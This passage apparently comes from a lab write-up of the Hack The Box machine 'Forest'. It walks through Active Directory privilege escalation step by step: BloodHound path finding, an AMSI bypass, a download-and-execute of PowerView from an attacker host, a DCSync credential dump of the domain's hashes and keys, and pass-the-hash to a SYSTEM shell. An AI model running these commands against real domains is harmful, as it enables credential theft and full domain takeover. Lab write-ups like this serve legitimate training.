  plugins:      /usr/share/neo4j/plugins
  import:       /usr/share/neo4j/import
  data:         /usr/share/neo4j/data
  certificates: /usr/share/neo4j/certificates
  run:          /usr/share/neo4j/run
Starting Neo4j.
WARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual.
2020-12-02 15:02:10.263+0000 INFO  ======== Neo4j 4.0.7 ========
2020-12-02 15:02:10.277+0000 INFO  Starting...
2020-12-02 15:02:19.712+0000 INFO  Bolt enabled on localhost:7687.
2020-12-02 15:02:19.714+0000 INFO  Started.
2020-12-02 15:02:22.404+0000 INFO  Remote interface available at http://localhost:7474/

On the first run, log in at http://localhost:7474/ with neo4j/neo4j; Neo4j forces a password change, and that new password is what BloodHound uses to connect on bolt://localhost:7687.

$ bloodhound --no-sandbox

Import your *.json files.

Searching for the svc-alfresco user:

This user is a member of 9 groups (counting nested membership), one of them Account Operators, a privileged built-in AD group.

The Account Operators group grants limited account creation privileges to a user. Members of this group can create and modify most types of accounts, including those of users, local groups, and global groups, and members can log in locally to domain controllers.

https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-accountoperators

Account Operators cannot touch members of protected groups such as Domain Admins (those are covered by AdminSDHolder), but they can create users and add them to any other group, and the groups created by the Exchange installation are not protected.

Using the query Shortest Paths to High Value Targets:

The Exchange Windows Permissions group has WriteDacl on the domain object htb.local, and Account Operators (through svc-alfresco) can add members to that group. The path is therefore: create or pick a user, add it to Exchange Windows Permissions, then use WriteDacl on the domain to grant that user the replication rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) that DCSync needs.

WriteDACL: Provides the ability to modify security on an object which can lead to Full Control of the object.
The right to modify the DACL in the object security descriptor.
Example: A service account may be granted this right to perform delegation in AD. If an attacker can guess this password (or potentially crack it by Kerberoasting), they now set their own permissions on associated objects which can lead to Full Control of an object which may involve exposure of a LAPS controlled local Administrator password.

https://adsecurity.org/?p=3658

We add the ACE with PowerView (Add-DomainObjectAcl, also reachable under its older alias Add-ObjectAcl), served from our own box:

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1

$evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> menu

[+] Bypass-4MSI 
[+] Dll-Loader 
[+] Donut-Loader 
[+] Invoke-Binary

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Bypass-4MSI

[+] Patched! :D

Bypass-4MSI patches AMSI in the current PowerShell process so that Defender does not block PowerView when it is loaded in memory.

Next we create a user, pep, add it to Exchange Windows Permissions (and to Remote Management Users, so it could also log in over WinRM), and use Add-DomainObjectAcl with pep's credentials to give pep DCSync rights on the domain. A fresh user is used rather than svc-alfresco itself because group changes do not apply to an already issued logon token; binding to LDAP with pep's credentials means the new membership is effective immediately for the ACL write.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user pep 1234567 /add /domain

The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" pep /add

The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" pep /add

The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> iex(new-object net.webclient).downloadstring("http://10.10.14.15:8080/PowerView.ps1")
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $pass = ConvertTo-SecureString "1234567" -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $cred = New-Object System.Management.Automation.PSCredential("htb\pep", $pass)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity pep -Rights DCSync

PowerView.ps1 has to be served from the attacker host at that URL (for example with python3 -m http.server 8080 in the directory holding it). Note that $cred must be built before Add-DomainObjectAcl runs: without it -Credential is empty, the bind falls back to svc-alfresco's token, which does not yet carry the new group, and the write is denied. -TargetIdentity names the domain object the ACE is written to.

$python3 /usr/share/doc/python3-impacket/examples/secretsdump.py htb/pep@10.10.10.161

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
bigb0ss:7601:aad3b435b51404eeaad3b435b51404ee:12d1b26faccfadebfc2c5840353001cc:::
pep:7603:aad3b435b51404eeaad3b435b51404ee:328727b81ca05805a68ef26acb252039:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:d4cee94cb410be98048d6890b64d8558:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::

[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
bigb0ss:aes256-cts-hmac-sha1-96:7325b427ac42df1b137f4974b1ffedbf5bb2831f1d373ca723abaa33f8d951d6
bigb0ss:aes128-cts-hmac-sha1-96:2c9b56bf23abfa31b950e579ce8f323c
bigb0ss:des-cbc-md5:5831bf0bbf5b85f7
pep:aes256-cts-hmac-sha1-96:75ad952a73b56b1cab38d49404054a20dcece16607f8b8a8f4de7b85807e1544
pep:aes128-cts-hmac-sha1-96:e94b42a879406123efae5836f41ab9ab
pep:des-cbc-md5:f208cb32b902d6bf
FOREST$:aes256-cts-hmac-sha1-96:eb73e0b4da66d7e36f1cd9d80778efc3a90e9924caf04acbc26fc80eb609dc5a
FOREST$:aes128-cts-hmac-sha1-96:c400b0ca4756e80c303aabdd096005f8
FOREST$:des-cbc-md5:0b2f32b62c26f23d
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...

The "RemoteOperations failed ... rpc_s_access_denied" line is expected: pep is not a local administrator, so the SAM/LSA path over the remote registry is denied, but the DRSUAPI replication path (DCSync) works thanks to the ACE we just added (-just-dc skips the remote registry attempt altogether). We now hold the Administrator NT hash, so there is nothing to crack: impacket's psexec accepts the hash directly (pass-the-hash, with the empty LM half aad3b435b51404eeaad3b435b51404ee in front):

$python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file fEteGHHh.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service UKhA on 10.10.10.161.....
[*] Starting service UKhA.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami

nt authority\system

C:\Windows\system32>cd c:/users
C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>type root.txt

f048XXXXXXXXXXXXXXXXXXXXXXXXXXXX



